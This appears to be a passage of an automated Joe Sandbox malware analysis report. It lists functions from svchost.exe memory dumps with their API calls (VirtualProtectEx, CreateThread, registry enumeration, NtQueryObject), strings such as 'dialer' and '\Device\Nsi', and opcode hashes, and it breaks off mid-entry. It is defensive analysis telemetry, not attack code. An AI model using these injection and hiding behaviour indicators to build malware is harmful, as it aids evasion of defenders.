LCMapStringEx, xrefs: 000002C9B029D6DC, 000002C9B029D6ED

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 2eec8832b97ce5dddc9f96510c1e1d03fa11bb635427e488926e31d5f1b70368
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: BE114D76608FC096EB60CB55F44869EB7A0F7C9B84F545126EE8D43B19DF38C884CB40

Function 000002C9AFBBD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9AFBBD6F9
LCMapStringW.KERNEL32 ref: 000002C9AFBBD781

Strings

LCMapStringEx, xrefs: 000002C9AFBBD6DC, 000002C9AFBBD6ED

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 76f3fda1c0e076ea54b1888dd76f1781767f17886037316c54cc9a4bdc47fdfa
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: BC110836608B8086E760DB16F44879AB7B4F7CDB90F584126EE8D87B59DF39C5918B00

Function 000002C9B0297A20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002C9B029821A
capture_previous_context.LIBCMT ref: 000002C9B0298232

Strings

ec, xrefs: 000002C9B02982AC

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: FeaturePresentProcessorcapture_previous_context
String ID: ec
API String ID: 3936158736-2323562846
Opcode ID: 2c65503d1a7aa5e0a471d737d4230fab2683a94c191c491eb449b430685928c9
Instruction ID: 3dda1e6d2f2e0d5a9bc08756b2d68010fd91c136a6ee2c0ede174fc29fbe6eb8
Opcode Fuzzy Hash: 2c65503d1a7aa5e0a471d737d4230fab2683a94c191c491eb449b430685928c9
Instruction Fuzzy Hash: 9A21C0B4604F88A1FA50DB18F85DB9D67A4F78434CF942526ED8E823A1DF7C8989C790

Function 000002C9B02994A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002C9B02994E8
RaiseException.KERNEL32 ref: 000002C9B029952E

Strings

csm, xrefs: 000002C9B029951B

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 83d254ad15bd7da8e47ab445b5ae9a5b36dcd0e3b3426ae11c97211ee1065dd8
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 8F113D72208B8492EB618B15F44875E77A4F788B98F585220EE8D07764DF38C995CB40

Function 000002C9AFBB94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002C9AFBB94E8
RaiseException.KERNEL32 ref: 000002C9AFBB952E

Strings

csm, xrefs: 000002C9AFBB951B

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 9ed55283645974109f541bc679ec140e0f31105b7c37283024ae057674955f2c
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 54110A32218B8482FB658B15E44875EB7A5F788B98F584221DE8D0BB68DF39C595CB00

Function 000002C9B029D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9B029D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002C9B029D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002C9B029D681

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: d1e545a4272dc192b637af96bb301e6b529ab3c4c5422f3250b4f34c5578261d
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: D7F058A6714FC4A2FA05DB51B44CA9D6321FB88B98F486025AE5903B55CE38CDDDD780

Function 000002C9AFBBD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9AFBBD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002C9AFBBD6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002C9AFBBD681

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 1815965ff7814cc6cd20d994cc4fbc1b0ac2264576af3809f9598a65583bd015
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: F0F05E2771078091FA15AB41F44CB9E6231AB8CB90F985025A95E07B54CE3AC9D6C710

Function 000002C9AFB8CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9AFB8CBC5

Strings

November, xrefs: 000002C9AFB8CBA8, 000002C9AFB8CBB2
October, xrefs: 000002C9AFB8CBBE

Memory Dump Source

Source File: 0000001B.00000002.2678865250.000002C9AFB80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFB80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afb80000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 6ecdd8a66092701ee57e02abf057434ec8dfe7975848859ff8bf84ddec529c17
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 7FE092A3200945D2FA159B51F48CBFC7231EBC4744F699022955D06252CF3ECCC683C0

Function 000002C9B029D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9B029D631
TlsSetValue.KERNEL32 ref: 000002C9B029D648

Strings

FlsSetValue, xrefs: 000002C9B029D61E

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: ce6e2c2a467f76a46f30b4779cc058eb1d0d6559ab44eb9d1d7f8531b1e16408
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: E1E039A1200EC4B1FE04CB60B80CA9C6222BBC8788F486022E90906255CE38CCDDC780

Function 000002C9AFBBD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002C9AFBBD631
TlsSetValue.KERNEL32 ref: 000002C9AFBBD648

Strings

FlsSetValue, xrefs: 000002C9AFBBD61E

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 146cf93f757b0ee81c007e7b4e682ee62a0587f8255a98e15986df7a286fc573
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: ADE0ED63710640D1FA196B55F84DFDE6332AB8C780F9C5126D91E0A395CE3EC9D6CB10

Function 000002C9B0291D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C9B0291D9B
HeapAlloc.KERNEL32 ref: 000002C9B0291DAA
GetProcessHeap.KERNEL32 ref: 000002C9B0291E1E
HeapFree.KERNEL32 ref: 000002C9B0291E2C

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: a087b1be76e8bdfbc502756469047ea37c6005ab463975bcf2f2fdab51928f63
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: CA216D62604FC492EB11CF5AB40C65EA3A0FB88B98F455121EE8D47B24EF78C98AC740

Function 000002C9AFBB1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C9AFBB1D9B
HeapAlloc.KERNEL32 ref: 000002C9AFBB1DAA
GetProcessHeap.KERNEL32 ref: 000002C9AFBB1E1E
HeapFree.KERNEL32 ref: 000002C9AFBB1E2C

Memory Dump Source

Source File: 0000001B.00000002.2679702647.000002C9AFBB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9AFBB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9afbb0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 8f1b9d447ad28db45d065f00b2fb590bbea129da44d0c00a51e8468e04c724b6
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 97215E23605B9086FB118F6AE40C79EF3B0FB88B94F594125EE8D47B64EF79C5968700

Function 000002C9B0291274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C9B029127A
HeapAlloc.KERNEL32 ref: 000002C9B0291289
GetProcessHeap.KERNEL32 ref: 000002C9B02912A3
HeapAlloc.KERNEL32 ref: 000002C9B02912B4

Memory Dump Source

Source File: 0000001B.00000002.2686613750.000002C9B0290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C9B0290000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2c9b0290000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 15f94d5057715e0b58acb08f1f16f99d9bf7d4bb7b57bd560e8eb1a0bd6a5476
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: DBE032B1A11A48D6F708CBA2E80C74A76E1FB88B09F489024C90907360DF7D88DACB80

Analysis Process: svchost.exePID: 772, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	228
Total number of Limit Nodes:	5

Executed Functions

Function 000002C06FD4104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002C06FD410AB
RegEnumValueW.ADVAPI32 ref: 000002C06FD4110E
GetProcessHeap.KERNEL32 ref: 000002C06FD41155
HeapAlloc.KERNEL32 ref: 000002C06FD41163
GetProcessHeap.KERNEL32 ref: 000002C06FD41187
HeapFree.KERNEL32 ref: 000002C06FD41195

Strings

d, xrefs: 000002C06FD410CE

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: a199c9e606cde0bcb41938825182d98f317668442cb62c32ec3da268671c5b1e
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 53417133214B80D7EB658F61E488B9EB7A6F389B84F108125DB8907B58DF39E174CB00

Function 000002C06FD43458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002C06FD4347A
PathFindFileNameW.SHLWAPI ref: 000002C06FD43489

Part of subcall function 000002C06FD43930: StrCmpNIW.SHLWAPI ref: 000002C06FD43948

Part of subcall function 000002C06FD43878: GetModuleHandleW.KERNEL32 ref: 000002C06FD43886
Part of subcall function 000002C06FD43878: GetCurrentProcess.KERNEL32 ref: 000002C06FD438B4
Part of subcall function 000002C06FD43878: VirtualProtectEx.KERNEL32 ref: 000002C06FD438D6
Part of subcall function 000002C06FD43878: GetCurrentProcess.KERNEL32 ref: 000002C06FD438F4
Part of subcall function 000002C06FD43878: VirtualProtectEx.KERNEL32 ref: 000002C06FD43915

CreateThread.KERNEL32 ref: 000002C06FD434D7

Part of subcall function 000002C06FD41EB4: GetCurrentThread.KERNEL32 ref: 000002C06FD41EBF

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: c53c9aee286932cc07a73740aeb3d2f6a4814bd33fbf37612aa41a45f7e57298
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 34113960610601D2FF21AF29E8CFFAD62DFA754304F7400259A0A85194EF3BE0B4A210

Function 000002C06FD41C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002C06FD41650: GetProcessHeap.KERNEL32 ref: 000002C06FD4165B
Part of subcall function 000002C06FD41650: HeapAlloc.KERNEL32 ref: 000002C06FD4166A
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD416DA
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41707
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41721
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41741
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD4175C
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD4177C
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41797
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD417B7
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD417D2
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD417F2

Sleep.KERNEL32 ref: 000002C06FD41C43
SleepEx.KERNELBASE ref: 000002C06FD41C49

Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD4180D
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD4182D
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41848
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41868
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD41883
Part of subcall function 000002C06FD41650: RegOpenKeyExW.ADVAPI32 ref: 000002C06FD418A3
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD418BE
Part of subcall function 000002C06FD41650: RegCloseKey.ADVAPI32 ref: 000002C06FD418C8

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: f875fc6a0e9d98c1947966041f34012ff89924ce0ce28e87e090021eb28f4332
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 1731B1A5200601D1FF52AF36D9C9B6E17EFAB44BD8F345021DE0987696EF36E8708250

Function 000002C06FD43930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000002C06FD43948

Strings

dialer, xrefs: 000002C06FD43941

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: c2951648c6b7cf44490d470145f2040370dc48019229244d0ed3b7e3bb55ef3c
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: F9D0A72131170BC6FF54DFA5C8CBB68239BEB04704F548020CA0142114E72AADADDB10

Function 000002C06F7B2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002C06F7B2A31

Memory Dump Source

Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 431c15bf0da77f514971a714979d07dfae198914b74046ec2d3b29537a4f07ff
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 02612022702250C7FB69CF95D488F6DF399FB05B94F248025DE1907784EB3AEA62C700

Function 000002C06FD4AE0C Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 000002C06FD4AE4A

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
Instruction ID: 200bac7fa58e0e572d992cd4ef0606b832f4c12cf6a35b014a560acbc1825d99
Opcode Fuzzy Hash: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
Instruction Fuzzy Hash: 45F01551701245C5FE647FB2E9CDF6D61CA6B88BA0F684A305D3A862C2EA3BE4718211

Non-executed Functions

Function 000002C06FD42CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002C06FD42D80
lstrlenW.KERNEL32 ref: 000002C06FD42FBA

Part of subcall function 000002C06FD41A14: OpenProcess.KERNEL32 ref: 000002C06FD41A3A
Part of subcall function 000002C06FD41A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002C06FD41A58
Part of subcall function 000002C06FD41A14: PathFindFileNameW.SHLWAPI ref: 000002C06FD41A67
Part of subcall function 000002C06FD41A14: lstrlenW.KERNEL32 ref: 000002C06FD41A73
Part of subcall function 000002C06FD41A14: StrCpyW.SHLWAPI ref: 000002C06FD41A86
Part of subcall function 000002C06FD41A14: CloseHandle.KERNEL32 ref: 000002C06FD41A94

GetProcAddress.KERNEL32 ref: 000002C06FD42D95

Part of subcall function 000002C06FD41554: StrCmpIW.SHLWAPI ref: 000002C06FD41585

Part of subcall function 000002C06FD43930: StrCmpNIW.SHLWAPI ref: 000002C06FD43948

StrCmpNIW.SHLWAPI ref: 000002C06FD42DD8
lstrlenW.KERNEL32 ref: 000002C06FD42F00

Strings

\Device\Nsi, xrefs: 000002C06FD42DCB
ntdll.dll, xrefs: 000002C06FD42D79
NtQueryObject, xrefs: 000002C06FD42D8B

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: e3ee47866cff61545546f44a158e128c6dc66d2f2c0619a6169b93d52d2f0f5b
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: E5B1D172210A50C2FF658F2AC489BAD63EAFB44B89F645116EE4993794DF37EC60D340

Function 000002C06FD47E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002C06FD47E8C
RtlCaptureContext.NTDLL ref: 000002C06FD47EB9
RtlLookupFunctionEntry.NTDLL ref: 000002C06FD47ED3
RtlVirtualUnwind.NTDLL ref: 000002C06FD47F14
IsDebuggerPresent.KERNEL32 ref: 000002C06FD47F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002C06FD47F89
UnhandledExceptionFilter.KERNEL32 ref: 000002C06FD47F94

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 89cdadd8c149096420b7902b47dd2e0f96c6f4b8536fb5c011aa3cf96c3d587b
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 0E31A072205B80DAFF609F60E884BED73AAF784744F54452ADA4E47B98EF39C658C700

Function 000002C06FD4B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002C06FD4B585
RtlLookupFunctionEntry.NTDLL ref: 000002C06FD4B59D
RtlVirtualUnwind.NTDLL ref: 000002C06FD4B5D8
IsDebuggerPresent.KERNEL32 ref: 000002C06FD4B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002C06FD4B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002C06FD4B626

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 46e98df112fb04af7edad637ab195c16b85d4997b369ee7fb7328cebb6f9520c
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: BD31A032204F80D6EB20CF24E884B9E73AAF788754F600126EA9D47B99DF39C565CB00

Function 000002C06FD4FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002C06FD4FF67
WriteFile.KERNEL32 ref: 000002C06FD5021E
WriteFile.KERNEL32 ref: 000002C06FD50270
GetLastError.KERNEL32 ref: 000002C06FD50372
GetLastError.KERNEL32 ref: 000002C06FD503D2

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 7fd8dfed8afbdb916fab0a86991f891fa3a4b7d53afc99eb7d188b36701e131e
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
